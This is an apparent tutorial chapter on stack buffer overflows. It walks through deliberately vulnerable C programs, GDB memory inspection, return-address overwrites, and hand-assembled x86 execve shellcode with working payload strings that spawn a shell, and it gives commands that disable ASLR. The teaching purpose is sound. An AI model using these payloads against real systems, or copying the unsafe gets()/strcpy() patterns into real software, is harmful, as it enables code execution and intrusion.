====== Basic Concepts of Buffer Overflows ====== Interacting with memory is part of every non-trivial program. In order to guarantee successful data processing, it is of utmost importance to correctly manage data buffer sizes. Writing more data than the buffer is able to contain, results in a so-called buffer overflow. The memory region following directly afterwards is overwritten in this case. This chapter tries to explain this behavior and its effect in a detailed and practical way. Modern compilers and operating systems include protection mechanisms to avoid the effects of buffer overflows. For the sake of simplicity, these mechanisms are neglected for now and explained in later chapters. Example codes include compilation instructions in the first line to disable optimizations and protection mechanisms. All examples but the first one require that [[..protection:aslr|ASLR]] is disabled. Following command disables ASLR on a Linux system until it is enabled again or the machine is rebooted. $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space To enable ASLR again, use the command below. $ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space :!: As disabling ASLR and running binaries without compiler protection mechanisms imposes a security risk, it is recommended to apply this change and execute the vulnerable applications in a virtual machine or protected environment. ===== Control Flow Manipulation ===== Keeping the theoretical concept from above in mind, a first practical example is presented next. The code below asks for the user's name and prints whether the user is an administrator or not. A user is classified as an administrator if the entered name is "admin". // gcc -g -O0 -m32 -std=c99 control.c #include #include #include struct User { char name[8]; bool is_admin; }; int main() { struct User user = {0}; printf("Enter user name:\n"); gets(user.name); if(strcmp(user.name, "admin") == 0) user.is_admin = true; if(user.is_admin) printf("Welcome back administrator!\n"); else printf("Meh, hello %s. I was hoping for the administrator.\n", user.name); return 0; } Executing the code and entering "nufan" as name results in the output shown below. $ ./a.out Enter user name: nufan Meh, hello nufan. I was hoping for the administrator. Assuming basic knowledge about the C programming language, this behavior should be no surprise. While the code is short and straightforward, it still contains a significant security vulnerability. ''user.name'' is a character array with a fixed size of 8 bytes. At the same time, the ''[[c:lib:stdio:gets|gets()]]'' function does not limit the length of the input. Next, we intentionally exceed the available input capacity. $ ./a.out Enter user name: 123456789 Welcome back administrator! According to the output we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we will have a look at the memory content after the initialization and after each of the above input cases. [[gdb:start|GDB]] is used to inspect the memory of the ''user'' variable. Additionally, the relevant memory region is visualized to ease the understanding. First, the state of the ''user'' variable is inspected directly after initialization. A breakpoint is set in line 16 to stop execution and print the ''user'' variable. $ gdb -q a.out Reading symbols from a.out...done. (gdb) break 16 Breakpoint 1 at 0x647: file control.c, line 16. (gdb) run Starting program: /home/memory-corruption/a.out Breakpoint 1, main () at control.c:16 16 printf("Enter user name:\n"); (gdb) p user $1 = {name = "\000\000\000\000\000\000\000", is_admin = false} Below you can see a memory-oriented visualization of the GDB output. {{.basics_init.png?300|}} Just like before, we first enter the short name "nufan" and look at the resulting application state. To inspect the variable before exiting the application we set a breakpoint at the ''return'' statement in line 26. (gdb) break 26 Breakpoint 2 at 0x565556b8: file control.c, line 26. (gdb) continue Continuing. Enter user name: nufan Meh, hello nufan. I was hoping for the administrator. Breakpoint 2, main () at control.c:26 26 return 0; (gdb) p user $2 = {name = "nufan\000\000", is_admin = false} {{.basics_normal.png?300|}} As expected, the memory content looks reasonable. Nevertheless, we still have to look at the second - and much more interesting - case. Using "123456789" as name exceeds the space of ''user.name'' and results in the following state. $ gdb -q a.out Reading symbols from a.out...done. (gdb) break 26 Breakpoint 1 at 0x6b8: file control.c, line 26. (gdb) run Starting program: /home/memory-corruption/a.out Enter user name: 123456789 Welcome back administrator! Breakpoint 1, main () at control.c:26 26 return 0; (gdb) p user $1 = {name = "12345678", is_admin = 57} {{.basics_overflow.png?300|}} The ''user.name'' buffer was completely filled up. Due to the fact that even more data was entered, the '9' character ([[theory:encoding:ascii|ASCII]] value 57) was spilled over to the consecutive variable ''user.is_admin''. Remember that in the C programming language every value other than 0 is considered to be true. Thus, the application classifies the user as administrator. Simply by overflowing an input buffer the control flow of the application was redirected to an unintended execution branch. Although this example seems harmless as the control flow differs only by a static output, this vulnerability could equally overwrite crucial user data((S. Chen, J. Xu, E. Sezer, P. Gauriar, and R. Iyer, „Non-Control-Data Attacks Are Realistic Threats“, 14th USENIX Security Symposium, 2005)) or allow an attacker to take full control over the application. ===== Arbitrary Function Execution ===== While the previous example already made use of the concept of a buffer overflow, it is rather limited as it is restricted to the use of a predefined control flow branch. With the next example we will take the exploitation one step further. The example code copies the first command line argument to a variable located on the stack. // gcc -g -O0 -m32 -no-pie -fno-pie -fno-stack-protector -mpreferred-stack-boundary=2 function.c #include #include void admin_stuff() { printf("Welcome back administrator!\n"); } int main(int argc, char *argv[]) { char buffer[8] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Copying \"%s\"\n", argv[1]); strcpy(buffer, argv[1]); return 0; } Clearly, ''[[c:lib:string:strcpy|strcpy()]]'' copies an input of variable size into a buffer of fixed size. Note that the code contains a function ''admin_stuff()'' which is not part of the regular control flow. However, in contrast to the previous example, no local variable determining the control flow is located on the stack. This time we will not try to switch to a predefined execution branch, rather we want to call ''admin_stuff()'' which is an existing function within the binary but outside of any control flow(([[https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/|Buffer Overflow Exploit - Dhaval Kapil]])). Considering the background knowledge explained in [[..background:exec|the previous chapter about program execution and function calls]], we extend the view of the memory to include the information about the stack frame. The behavior of the application under normal circumstances is observed in GDB. Checking the memory directly after the initialization of the buffer, the top of the stack looks as follows. $ gdb -q a.out Reading symbols from a.out...done. (gdb) set backtrace past-main (gdb) break 14 Breakpoint 1 at 0x804848d: file function.c, line 14. (gdb) break 23 Breakpoint 2 at 0x80484d2: file function.c, line 23. (gdb) run ABCD Starting program: /home/memory-corruption/a.out ABCD Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14 14 if(argc != 2) (gdb) x/4wx $esp 0xffffd3a0: 0x00000000 0x00000000 0x00000000 0xf7e11286 {{.basics_function_init.png?300|}} We can identify 8 bytes of the ''buffer'' variable, 4 bytes of the saved ''EBP'' register and the 4 byte return address. Just before finishing execution, the second breakpoint causes the execution to stop. (gdb) continue Continuing. Copying "ABCD" Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd3a0: 0x44434241 0x00000000 0x00000000 0xf7e11286 {{.basics_function_normal.png?300|}} Now the buffer is partially filled with the entered data. Observe the [[theory:endian|little-endian]] byte order of the values. The goal of this exercise is to overwrite the return address ''0xf7e11286'' on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the ''admin_stuff()'' function. With the protection mechanisms [[..protection:aslr|ASLR]] and [[..protection:pie|PIE]] disabled, the function has a static address within the binary and at runtime. ''nm'' is used to resolve the address of the symbol. $ nm a.out | grep admin_stuff 08048466 T admin_stuff This output shows that the ''admin_stuff()'' symbol is located at address ''0x08048466'' in the text segment of the binary. In order to overwrite the return address, the 8 byte ''buffer'' and the 4 byte ''EBP'' copy need to be skipped first. "ABCDEFGHIJKL" is chosen to fill up this region. The payload is terminated by the address of ''admin_stuff()'' (''0x08048466'') in little-endian format. $ gdb -q a.out Reading symbols from a.out...done. (gdb) break 23 Breakpoint 1 at 0x80484d2: file function.c, line 23. (gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Copying "ABCDEFGHIJKLf[?]" Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd390: 0x44434241 0x48474645 0x4c4b4a49 0x08048466 (gdb) continue Continuing. Welcome back administrator! Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () {{.basics_function_overflow.png?300|}} Proven by the output, the ''admin_stuff()'' function is really executed. Due to the corrupted stack layout the program crashes directly after the execution of the function with a segmentation fault. Remember that ''[[c:lib:string:strcpy|strcpy()]]'' writes a ''\0'' byte to finalize the destination string which was neglected in the illustrations. All addresses are constant over multiple executions, so the exploit also works outside GDB and with arbitrary fill values for the memory region before the return address. $ ./a.out $(echo -en "000000000000\x66\x84\x04\x08") Copying "000000000000f[?]" Welcome back administrator! Segmentation fault ===== Arbitrary Code Execution ===== Although functionally identical to the previous example, the vulnerable program of this section has a larger buffer but does not contain any predefined function we want to call. Additionally, the address of the buffer is printed upon execution. // gcc -g -O0 -m32 -no-pie -fno-pie -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack execve.c #include #include int main(int argc, char *argv[]) { char buffer[32] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Buffer: %p\n", buffer); strcpy(buffer, argv[1]); return 0; } The first step is to redirect execution to the data copied to the buffer. This is accomplished by filling up the 32 bytes of ''buffer'' plus the 4 bytes of the saved ''EBP'' register and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses slightly differ when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the ''buffer'' array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. During the following example the buffer is assumed to be located at ''0xffffd358''. $ gdb -q ./a.out Reading symbols from ./a.out...done. (gdb) set disassembly-flavor intel (gdb) disassemble main Dump of assembler code for function main: 0x08048466 <+0>: push ebp [...] 0x080484d1 <+107>: ret End of assembler dump. (gdb) break *0x080484d1 Breakpoint 1 at 0x080484d1: file execve.c, line 19. (gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Buffer: 0xffffd358 Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19 20 } (gdb) ni 0xffffd358 in ?? () {{.basics_exec_overflow.png?300|}} As the last line of the output indicates, the execution was successfully redirected to the buffer. However, when inspecting the instructions at this location, no meaningful code can be identified: (gdb) x/s $eip 0xffffd358: "12345678901234567890123456789012AAAAX\323\377\377" (gdb) x/5i $eip => 0xffffd358: xor DWORD PTR [edx],esi 0xffffd35a: xor esi,DWORD PTR [esi*1+0x39383736] 0xffffd361: xor BYTE PTR [ecx],dh 0xffffd363: xor dh,BYTE PTR [ebx] 0xffffd365: xor al,0x35 (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0xffffd35a in ?? () The program crashes because of invalid memory accesses. Totally understandable, as we only wanted to fill up the memory and did not care about mapping its content to instructions yet. What we need at this point is executable code in compiled form. Generating this code using a high-level programming language most likely introduces unintended instructions, so we fall back to assembly. More specifically, we will use the [[nasm:start|NASM]](([[http://www.nasm.us/|NASM]])) with Intel syntax(([[http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm|Intel and AT&T Syntax]])) to create our so-called shellcode. Our final goal is to execute the shell ''/bin/sh'' via the ''execve'' system call(([[http://man7.org/linux/man-pages/man2/execve.2.html|execve(2) - Linux manual page]]))(([[http://hackoftheday.securitytube.net/2013/04/demystifying-execve-shellcode-stack.html|SecurityTube.net Hack of the Day: Demystifying the Execve Shellcode (Stack Method)]])). Calling ''execve'' has the following requirements when the interrupt is triggered: * ''EAX'' contains an identifier for the system call and needs to have the value 11 (''0x0b'') for ''execve''. * ''EBX'' points to the (''\0''-terminated) name of the executable to be executed ("/bin/sh" in our case). * ''ECX'' points to ''argv'', this means it represents an array that contains at least a pointer to the executable name (as referenced by ''EBX'') and is terminated with a ''NULL''-pointer. * ''EDX'' points to ''envp''. As we do not need environment variables for the execution, we can simply set it to ''NULL''. First we need to correct the stack pointer. When returning from the ''main'' function, the stack frame is destroyed by increasing ''ESP''. Our buffer is still there, but ''ESP'' was moved to a higher memory address. As we want to push some values, we need to make sure ''ESP'' points to a memory address lower than our buffer and we do not overwrite our own code. Subtracting ''0x30'' (48) is a good guess as we want to skip the return address (4 bytes), the saved ''EBP'' (4 bytes), ''buffer'' (32 bytes) and possibly some stack-alignment padding introduced by the compiler. sub esp,0x30 Next, we need the ''\0''-terminated string "/bin/sh" on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse order. Thus we start with the termination character ''\0''. Keep in mind that we are using ''[[c:lib:string:strcpy|strcpy()]]'' to copy the data. It has the property to stop copying at a ''\0'' character in the source string, so we are not allowed to have any 0 values in the compiled code. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the used value. xor eax,eax We do not have to care about the size of this termination value, so we push the 4 byte register to the stack: push eax The remaining string is 7 characters long. To push it as 2 words of 4 byte each, we need to add a fill character. "//bin/sh" is an equivalent but 8 character alternative to "/bin/sh". push 0x68732f6e ; hs/n push 0x69622f2f ; ib// Now that the string is set up correctly, the registers need to be filled accordingly. ''EBX'' needs to point to the name of the binary to execute. "//bin/sh" was pushed to the stack with the previous commands. Hence, ''ESP'' is a pointer to this string and can be copied to ''EBX''. mov ebx,esp Successful execution requires ''argv'' to be set correctly. This convention is also visible in C programs: ''argv'' is an array of pointers to strings (''char *argv[]'') and terminated by a ''NULL'' value. ''argv[0]'' contains the executable name. push eax ; argv[1] = NULL push ebx ; argv[0] = "//bin/sh" ''ECX'' needs the point to this array of pointers. mov ecx,esp Because no environment variables are needed, ''envp'', which is passed via ''EDX'', is set to ''NULL''. mov edx,eax Lastly, the system call number is set to 11 (''0x0b'') and the interrupt triggered. mov al,0xb int 0x80 We are done! Here is the full code: ; nasm -f elf32 execve.s sub esp,0x30 xor eax,eax push eax push 0x68732f6e push 0x69622f2f mov ebx,esp push eax push ebx mov ecx,esp mov edx,eax mov al,0xb int 0x80 After translation with the ''nasm'' assembler, ''objdump'' is used to extract the executable code from the compiled object file. $ objdump -d -M intel-mnemonic execve.o execve.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 83 ec 30 sub esp,0x30 3: 31 c0 xor eax,eax 5: 50 push eax 6: 68 6e 2f 73 68 push 0x68732f6e b: 68 2f 2f 62 69 push 0x69622f2f 10: 89 e3 mov ebx,esp 12: 50 push eax 13: 53 push ebx 14: 89 e1 mov ecx,esp 16: 89 c2 mov edx,eax 18: b0 0b mov al,0xb 1a: cd 80 int 0x80 A little bit of Bash magic helps to extract the opcodes and bring them into a usable form. $ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done \x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80 The command calls ''objdump'' and uses ''sed'' to drop the first seven lines of the output. ''cut'' is applied to get the second column in each line, which is the opcode of the instruction. A loop over these opcodes adds the required ''\x'' prefix to the output. Count the number of bytes used for the payload to calculate the required padding. $ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c 28 To fill up 36 bytes (32 byte buffer + 4 byte ''EBP'') a padding of 8 bytes is required. "12345678" was chosen in this case. Feeding this exploit into the application results in a command prompt. $ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff") Buffer: 0xffffd3b8 Depending on the command line settings, one might not notice the difference between the spawned shell and the simple termination of the binary. Executing the same command under ''strace'' and filtering for ''execve'' calls proves the execution of ''//bin/sh'' from the vulnerable binary. $ strace -e execve ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff") execve("./a.out", ["./a.out", "\203\35401\300Phn/shh//bi\211\343PS\211\341\211\302\260\v\315\2001234"...], 0x7fffffffe258 /* 47 vars */) = 0 strace: [ Process PID=10599 runs in 32 bit mode. ] Buffer: 0xffffd3b8 execve("//bin/sh", ["//bin/sh"], NULL) = 0 strace: [ Process PID=10599 runs in 64 bit mode. ] The overall memory state correlated with the assembly code is shown in the visualization below. {{.basics_exec_exploit.png?500|}} Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability! :-) ===== Arbitrary Code Execution via Standard Input ===== The examples above copied data passed as command line parameters. Another common data source is the standard input stream. As the exploitation via the standard input stream involves overcoming a common pitfall, it is observed with the following example. // gcc -g -O0 -m32 -std=c99 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack stdin.c #include int main(int argc, char *argv[]) { char input[32] = {0}; printf("Buffer: %p\n", input); gets(input); return 0; } Inspecting the code shows that the application prints the address of the buffer and then reads data from the standard input via the ''gets()'' function. Following explanation assumes the buffer is located at the address ''0xffffd324''. Using the shellcode from the previous section results in the payload structure listed next. * 28 bytes of shellcode * 12 bytes of padding to fill up the buffer and skip the saved EBP register * 4 bytes of return address (''0xffffd324'') A [[perl:start|Perl]] command helps to generate the input for the exploit. Even if you are not familiar with Perl, make sure you are able to understand and generate inputs in a scripting language (e.g. [[py:start|Python]] or [[bash:start|Bash]] are perfectly fine as well). $ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \ | ./a.out Buffer: 0xffffd324 $ echo $? 0 The program exits successfully but without providing us a shell to execute commands. Let's use ''strace'' to inspect what is going on. $ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \ | strace ./a.out [...] execve("//bin/sh", ["//bin/sh"], NULL) = 0 [...] read(0, "", 8192) = 0 exit_group(0) = ? The output shows that the shell was actually started, but closed immediately afterwards. Although confusing at the beginning, the explanation for this behavior is reasonable. After the shell is started up, it tries to read a command from the standard input. While the input stream was used for sending the payload to the application, we implicitly closed it afterwards. As the shell realizes there is no more input to read, it exits silently. To keep the shell open and enter commands manually, we need to keep the input stream open. One possibility to do so is the following. $ cat <(perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"') -\ | ./a.out ''<()'' is the process substitution operator and replaces the standard input stream of ''cat'' with the command between the parentheses which in our case is a Perl command. Additionally, with the ''-'' as second parameter, we signal ''cat'' to read from the standard input. ''cat'' first takes the output of the command in the parentheses and writes it to the pipe to ''a.out''. Keeping the stream open, it still waits for input on the standard input stream which is also passed on through the pipe(([[https://github.com/CMU-18739L-S15/PracticalCTFHacking/blob/master/binary_exploitation/README.md|PracticalCTFHacking - Binary Exploitation]])). \\ ----
[[..background:exec|← Back to program execution details]] [[..start|Overview]] [[.nop-sled|Continue with NOP selds →]]